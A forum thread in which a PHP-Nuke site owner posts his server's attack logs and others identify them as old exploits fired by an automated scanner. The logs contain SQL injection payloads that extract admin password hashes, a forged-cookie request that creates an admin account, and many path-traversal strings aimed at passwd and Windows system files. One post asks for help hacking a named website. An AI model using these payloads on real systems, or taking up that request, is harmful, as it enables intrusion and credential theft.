Waraxe Forums - My PHP-Nuke Web Site is under Attack

Saladin · Regular user

edited by icenix: IP addresses

195.XXX.XXX.XXX name=Web_Links&l_op=viewlink comments&lid=-1%20%20uni0n%20SELEC T%20aid,1,pwd,1%20FROM%20nuke_authors%20/* Sunday 06th of June 2004 10:02:19 AM
217.XXX.XXX.XXX op=AddAuthor&add_aid=sha rpknife&add_name=God&add_pwd=h4ck3r&add_email=turkhacker@eudoramail.com&add_radminsuper= 1&admin=eCcgVU5JT04gU0VMRUNU IDEvKjox Sunday 06th of June 2004 10:58:43 AM
217.XXX.XXX.XXX Admin-Cookie Hack Sunday 06th of June 2004 10:58:43 AM
217.XXX.XXX.XXX op=AddAuthor &add_aid=sharpknife&add_name= God&add_pwd=h4ck3r&add_ema il=turkhacker@eudoramai l.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox Sunday 06th of June 2004 10:58:51 AM
217.XXX.XXX.XXX Admin-Cookie Hack Sunday 06th of June 2004 10:58:51 AM
81.XXX.XXX.XXX CiTemplate=../../../../../winnt/win.ini Sunday 06th of June 2004 02:24:54 PM
81.XXX.XXX.XXX source=/msadc/Samples/../../../../../winnt/win.ini Sunday 06th of June 2004 02:25:11 PM
81.XXX.XXX.XXX CiTemplate=../../../../../winnt/win.ini Sunday 06th of June 2004 02:29:12 PM
81.XXX.XXX.XXX source=/msadc/Samples/../../../../../winnt/win.ini Sunday 06th of June 2004 02:29:35 PM
81.XXX.XXX.XXX CiTemplate=../../../somefile.ext Sunday 06th of June 2004 02:36:08 PM
81.XXX.XXX.XXX CiTemplate=../../../../../winnt/win.ini Sunday 06th of June 2004 03:18:35 PM
81.XXX.XXX.XXX source=/msadc/Samples/../../../../../winnt/win.ini Sunday 06th of June 2004 03:18:50 PM
81.XXX.XXX.XXX CiTemplate=../../../../../winnt/win.ini Sunday 06th of June 2004 03:43:46 PM
81.XXX.XXX.XXX source=/msadc/Samples/../../../../../winnt/win.ini Sunday 06th of June 2004 03:44:08 PM
81.XXX.XXX.XXX source=../../../../../../autoexec.bat

What are these codes for?

I see it for first time..

today my Site was under Attack..

Saladin · Regular user

What is the whole code of that attacks ? what has tried the attacker?

all are new codes for me, i had never seen

icenix · Advanced user

D O N T - P O S T - I P's

READ THE RULES

SteX · Advanced user

Saladin · Regular user

what is Admin-Cookie Hack?

What a code the attacker used ?

AND here

what did the attacker, what was the target?

xx.xx.xx.xxx CiTemplate=../../../../../winnt/win.ini Monday 07th of June 2004 07:49:57 AM
xx.xx.xx.xxx source=/msadc/Samples/../../../../../winnt/win.ini

waraxe · Site admin

They are some old IIS specific (Windows server) exploits:

http://archives.neohapsis.com/archives/ntbugtraq/2000-q1/0098.html
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/indexsrv/html/ixuwebqy_4pgz.asp
http://seclists.org/lists/bugtraq/1999/May/0062.html

Im not sure about Admin-Cookie Hack. What script was giving that warning? Fortress?

icenix · Advanced user

with a bit of luck,
as everyone is told not to...
maybe he used the same password that he tried to create on your site for his email account...
im not implying anything Wink

waraxe · Site admin

Saladin · Regular user

HELP me to hack a fascist site

bozkurt.net is a turkish fascist web site that always attacks kurdish rights and freedom attempts

bozkurt.net always writes fascist texts about kurdish people and the independence movement in northern iraqi kurdistan region..

Is there anyone that could help me? i just want to mail to all users not to visit this faschist web site, i would do it by Admin-Menu where you can send mails to all users..

it is just for freedom and peace..

bozkurt.net is really the biggest faschist site,

and i have informations that most of all attacks to some kurdish web sites come through the bozkurt.net, because when a kurdish site is attacked, they report about this in their forums and They are than so pleased.....

Saladin · Regular user

New Injections

xx.xxx.xxx.xx name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20uni0n%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/* Thursday 10th of June 2004 02:50:19 PM
xx.xxx.xxx.xx set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../etc/hosts Thursday 10th of June 2004 07:13:27 PM
xx.xxx.xxx.xx cwd=../../../../ Thursday 10th of June 2004 07:18:52 PM
xx.xxx.xxx.xx |=../../../../../../../../etc/passwd%20 Thursday 10th of June 2004 07:19:40 PM
xx.xxx.xxx.xx |=forum/view.php&topic=../../../../../../../etc/passwd Thursday 10th of June 2004 07:19:41 PM
xx.xxx.xxx.xx l=../../../../../../../../etc/passwd Thursday 10th of June 2004 07:20:22 PM
xx.xxx.xxx.xx l=forum/view.php&topic=../../../../../../../etc/passwd Thursday 10th of June 2004 07:20:23 PM
xx.xxx.xxx.xx name=/../../../../../../../../../../../../../../../../../../../../boot.ini Thursday 10th of June 2004 07:32:35 PM
xx.xxx.xxx.xx name=/../../../../../../../../../../../../../../../../../../../../config.sys Thursday 10th of June 2004 07:32:37 PM
xx.xxx.xxx.xx name=/../../../etc/passwd Thursday 10th of June 2004 07:32:40 PM
xx.xxx.xxx.xx name=/.../.../.../.../.../.../boot.ini Thursday 10th of June 2004 07:32:42 PM
xx.xxx.xxx.xx name=/.../.../.../.../.../.../config.sys Thursday 10th of June 2004 07:32:44 PM
xx.xxx.xxx.xx name=/....../config.sys Thursday 10th of June 2004 07:32:47 PM
xx.xxx.xxx.xx name=/..../config.sys Thursday 10th of June 2004 07:32:49 PM
xx.xxx.xxx.xx name=/....../boot.ini Thursday 10th of June 2004 07:32:51 PM
xx.xxx.xxx.xx name=/..../boot.ini Thursday 10th of June 2004 07:32:53 PM
xx.xxx.xxx.xx name=/../../../../../../etc/passwd Thursday 10th of June 2004 07:32:54 PM
xx.xxx.xxx.xx name=../../../../../../../../../etc/passwd%00 Thursday 10th of June 2004 07:32:56 PM
xx.xxx.xxx.xx name=../../boot.ini Thursday 10th of June 2004 07:32:58 PM
xx.xxx.xxx.xx name=../../config.sys Thursday 10th of June 2004 07:33:00 PM
xx.xxx.xxx.xx name=....//....//....//....//....//....//....//etc.passwd Thursday 10th of June 2004 07:33:02 PM
xx.xxx.xxx.xx name=../../../../../../../../../etc/passwd%00 Thursday 10th of June 2004 07:33:04 PM
xx.xxx.xxx.xx newlang=/../../../../../../../../../../../../../../../../../../../../boot.ini Thursday 10th of June 2004 07:33:14 PM
xx.xxx.xxx.xx newlang=/../../../../../../../../../../../../../../../../../../../../config.sys Thursday 10th of June 2004 07:33:21 PM
xx.xxx.xxx.xx newlang=/../../../etc/passwd Thursday 10th of June 2004 07:33:30 PM
xx.xxx.xxx.xx newlang=/.../.../.../.../.../.../boot.ini Thursday 10th of June 2004 07:33:31 PM
xx.xxx.xxx.xx newlang=/.../.../.../.../.../.../config.sys Thursday 10th of June 2004 07:33:33 PM
xx.xxx.xxx.xx newlang=/....../config.sys Thursday 10th of June 2004 07:33:45 PM
xx.xxx.xxx.xx newlang=/..../config.sys Thursday 10th of June 2004 07:33:46 PM
xx.xxx.xxx.xx newlang=/....../boot.ini Thursday 10th of June 2004 07:33:48 PM
xx.xxx.xxx.xx newlang=/..../boot.ini Thursday 10th of June 2004 07:33:50 PM
xx.xxx.xxx.xx newlang=/../../../../../../etc/passwd Thursday 10th of June 2004 07:33:53 PM
xx.xxx.xxx.xx newlang=../../../../../../../../../etc/passwd%00 Thursday 10th of June 2004 07:33:55 PM
xx.xxx.xxx.xx newlang=../../boot.ini Thursday 10th of June 2004 07:33:56 PM
xx.xxx.xxx.xx newlang=../../config.sys Thursday 10th of June 2004 07:33:58 PM
xx.xxx.xxx.xx newlang=....//....//....//....//....//....//....//etc.passwd Thursday 10th of June 2004 07:34:00 PM
xx.xxx.xxx.xx newlang=../../../../../../../../../etc/passwd%00 Thursday 10th of June 2004 07:34:02 PM
xx.xxx.xxx.xx newlang=....//....//....//....//....//....//....//etc.passwd

waraxe · Site admin

Very old exploits and for various platforms. Seems like work of automated scanner...

SteX · Advanced user

It is script kiddie who used some SCANER/SCRIPT to try many exploits on target systems..

LINUX · Moderator

jajajajaj kiddie Sad